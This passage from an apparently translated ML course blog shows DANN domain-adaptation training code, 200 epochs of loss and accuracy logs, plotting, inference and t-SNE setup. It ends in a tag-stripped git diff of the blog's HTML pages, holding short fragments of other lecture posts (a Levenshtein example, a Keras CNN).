    optimizer_C.step()

    optimizer_D.zero_grad()
    optimizer_F.zero_grad()
    optimizer_C.zero_grad()

    total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
    total_num += source_data.shape[0]
    print(i, end='\r')

return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

# Train for 200 epochs.
# After each epoch, save the model weights and print the training losses and accuracy.
for epoch in range(200):

    train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

    torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
    torch.save(label_predictor.state_dict(), f'predictor_model.bin')

    print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
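
Here lamb is fixed at 0.1. For reference, the original DANN paper instead anneals the adversarial weight from 0 to 1 as training progresses; a minimal sketch of that schedule (the helper name and the epoch-based progress measure are my own illustration, not part of this homework code):

import numpy as np

def adaptive_lamb(epoch, total_epochs=200, gamma=10.0):
    # DANN schedule: lamb rises smoothly from 0 to 1 with training progress p.
    p = epoch / total_epochs
    return 2.0 / (1.0 + np.exp(-gamma * p)) - 1.0

# e.g. replace the constant above with:
# train_epoch(source_dataloader, target_dataloader, lamb=adaptive_lamb(epoch))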
                      epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
                      epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
                      epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
                      epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
                      epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
                      epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
                      epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
                      epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
                      epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
                      epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
                      epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
                      epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
                      epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
                      epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
                      epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
                      epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
                      epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
                      epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
                      epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
                      epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
                      epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
                      epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
                      epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
                      epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
                      epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
                      epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
                      epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
                      epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
                      epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
                      epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
                      epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
                      epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
                      epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
                      epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
                      epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
                      epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
                      epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
                      epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
                      epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
                      epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
                      epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
                      epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
                      epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
                      epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
                      epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
                      epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
                      epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
                      epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
                      epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
                      epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
                      epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
                      epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
                      epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
                      epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
                      epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
                      epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
                      epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
                      epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
                      epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
                      epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
                      epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
                      epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
                      epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
                      epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
                      epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
                      epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
                      epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
                      epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
                      epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
                      epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
                      epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
                      epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
                      epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
                      epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
                      epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
                      epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
                      epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
                      epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
                      epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
                      epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
                      epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
                      epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
                      epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
                      epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
                      epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
                      epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
                      epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
                      epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
                      epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
                      epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
                      epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
                      epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
                      epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
                      epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
                      epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
                      epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
                      epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
                      epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
                      epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
                      epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
                      epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
                      epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
                      epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
                      epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
                      epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
                      epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
                      epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
                      epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
                      epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
                      epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
                      epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
                      epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
                      epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
                      epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
                      epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
                      epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
                      epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
                      epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
                      epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
                      epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
                      epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
                      epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
                      epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
                      epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
                      epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
                      epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
                      epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
                      epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
                      epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
                      epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
                      epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
                      epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
                      epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
                      epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
                      epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
                      epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
                      epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
                      epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
                      epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
                      epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
                      epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
                      epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
                      epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
                      epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
                      epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
                      epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
                      epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
                      epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
                      epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
                      epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
                      epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
                      epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
                      epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
                      epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
                      epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
                      epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
                      epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
                      epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
                      epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
                      epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
                      epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
                      epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
                      epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
                      epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
                      epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
                      epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
                      epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
                      epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
                      epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
                      epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
                      epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
                      epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
                      epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
                      epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
                      epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
                      epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
                      epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
                      epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
                      epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
                      epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
                      epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
                      epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
                      epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
                      epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
                      epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
                      epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
                      epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
                      epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
                      epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
                      epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
                      epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
                      epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
                      epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
                      epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
                      epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
                      epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

Plotting the curves:

import re
import matplotlib.pyplot as plt

# The raw log text from training.
data = """
epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
...
"""

# Extract the numbers with a regular expression.
pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
matches = re.findall(pattern, data)

# Convert the matches into separate series.
epochs = []
d_losses = []
f_losses = []
accuracies = []

for match in matches:
    epoch, d_loss, f_loss, acc = map(float, match)
    epochs.append(int(epoch))
    d_losses.append(d_loss)
    f_losses.append(f_loss)
    accuracies.append(acc)

# Draw the figure.
plt.figure(figsize=(10, 6))

# Plot D loss and F loss.
plt.subplot(2, 1, 1)
plt.plot(epochs, d_losses, label='D Loss', color='blue')
plt.plot(epochs, f_losses, label='F Loss', color='orange')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('Train Losses Over Epochs')
plt.legend()

# Plot accuracy.
plt.subplot(2, 1, 2)
plt.plot(epochs, accuracies, label='Accuracy', color='green')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.title('Accuracy Over Epochs')
plt.legend()

plt.tight_layout()
plt.show()

                      png

Inference

We use pandas to generate the csv file.

By the way, the performance of a model trained for only 200 epochs may be unstable; you can train for more epochs to get a more stable performance.

import numpy as np
import pandas as pd

# Initialize the result list and put both models in evaluation mode.
result = []
label_predictor.eval()
feature_extractor.eval()

# Loop over the test data and predict.
for i, (test_data, _) in enumerate(test_dataloader):
    test_data = test_data.cuda()

    class_logits = label_predictor(feature_extractor(test_data))

    x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
    result.append(x)

result = np.concatenate(result)

# Generate your submission:
# concatenate the predictions and write them to a csv file.
df = pd.DataFrame({'id': np.arange(0, len(result)), 'label': result})
df.to_csv('DaNN_submission.csv', index=False)
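
As a side note, prediction needs no gradients at all; wrapping the forward passes in torch.no_grad() skips building the autograd graph and saves memory. A minimal sketch of the same loop with it (identical variable names, purely illustrative):

with torch.no_grad():
    for test_data, _ in test_dataloader:
        test_data = test_data.cuda()
        # No graph is recorded here, so .detach() is no longer needed.
        class_logits = label_predictor(feature_extractor(test_data))
        result.append(torch.argmax(class_logits, dim=1).cpu().numpy())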

Visualization

We use a t-SNE plot to inspect the distribution of the extracted features.

                      import numpy as np
                      import matplotlib.pyplot as plt
                      from sklearn import manifold
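
The rest of the visualization code is not shown here; a minimal sketch of what it could look like, assuming the trained feature_extractor and the source/target dataloaders from above (the loop structure and plot styling are my own illustration):

import numpy as np
import matplotlib.pyplot as plt
import torch
from sklearn import manifold

feats, domains = [], []
# Collect features from a few batches of each domain (0 = source, 1 = target).
for loader, dom in [(source_dataloader, 0), (target_dataloader, 1)]:
    for j, (x, _) in enumerate(loader):
        with torch.no_grad():
            f = feature_extractor(x.cuda()).cpu().numpy()
        feats.append(f.reshape(f.shape[0], -1))
        domains.append(np.full(f.shape[0], dom))
        if j >= 4:  # a few hundred points are enough for a qualitative picture
            break

X = np.concatenate(feats)
y = np.concatenate(domains)

# Project the high-dimensional features to 2-D and color by domain.
X_2d = manifold.TSNE(n_components=2, init='pca', random_state=0).fit_transform(X)
plt.scatter(X_2d[:, 0], X_2d[:, 1], c=y, cmap='coolwarm', s=5)
plt.title('t-SNE of extracted features (source vs. target)')
plt.show()

If the domain adaptation worked, the source and target points should be well mixed rather than forming two separate clusters.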
                      @@ -4822,6 +4820,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = "360px"; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" index 12592cd3f3..c173bf88a3 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" @@ -44,8 +44,6 @@ - - @@ -4822,6 +4820,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" index 0d71d286e5..639ad76d4d 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" @@ -44,8 +44,6 @@ - - @@ -4494,6 +4492,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" index 67528c170e..95c626bb9e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" @@ -44,8 +44,6 @@ - - @@ -5145,6 +5143,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" index 8e0295f637..8ce585591a 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" @@ -44,8 +44,6 @@ - - @@ -4654,6 +4652,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" index 9575e5612c..999a404b47 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" @@ -44,8 +44,6 @@ - - @@ -5111,6 +5109,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" index 4340916707..7deb8e9f61 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" @@ -44,8 +44,6 @@ - - @@ -935,10 +933,10 @@

                      Leve
• The third Decoder is a token classifier that predicts the corresponding word at each 【PLH】 position.

This model is trained with the learn-from-another-model approach mentioned above (knowledge distillation). The specific algorithm is the Levenshtein Distance Algorithm:

import Levenshtein
Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")

3

Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")

[('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]
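
For reference, the Levenshtein distance itself comes from a simple dynamic program; a minimal sketch (a hypothetical helper, not from the Levenshtein package):

def levenshtein(a: str, b: str) -> int:
    # dp[j] holds the edit distance between a[:i] and b[:j] for the current row i.
    dp = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        prev, dp[0] = dp[0], i
        for j, cb in enumerate(b, 1):
            prev, dp[j] = dp[j], min(
                dp[j] + 1,          # delete ca
                dp[j - 1] + 1,      # insert cb
                prev + (ca != cb),  # replace (or match)
            )
    return dp[-1]

print(levenshtein("ABCEFGHJJ", "ABCDEFGHI"))  # 3, matching Levenshtein.distance above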

                    png

                    CTC

                    png

                    @@ -5042,6 +5040,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" index f1038bca01..ec17649b75 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" @@ -44,8 +44,6 @@ - - @@ -5049,6 +5047,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" index fd2931b8e6..6095528f6b 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" @@ -44,8 +44,6 @@ - - @@ -4677,6 +4675,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" index 91b43a9125..29bbae267e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" @@ -44,8 +44,6 @@ - - @@ -4600,6 +4598,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" index 7384fe8325..f57a336310 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" @@ -44,8 +44,6 @@ - - @@ -477,7 +475,7 @@

                    png

model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same', input_shape=(120, 120, 3)))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(256, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1024))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))

Write a convolutional neural network, and it turns out to work remarkably well!

                    png

                    png

                    @@ -4588,6 +4586,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" index 047aa5a631..188081e209 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" @@ -44,8 +44,6 @@ - - @@ -4710,6 +4708,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" index a547afbec4..4dafd83f94 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" @@ -44,8 +44,6 @@ - - @@ -4573,6 +4571,8 @@

                    目录

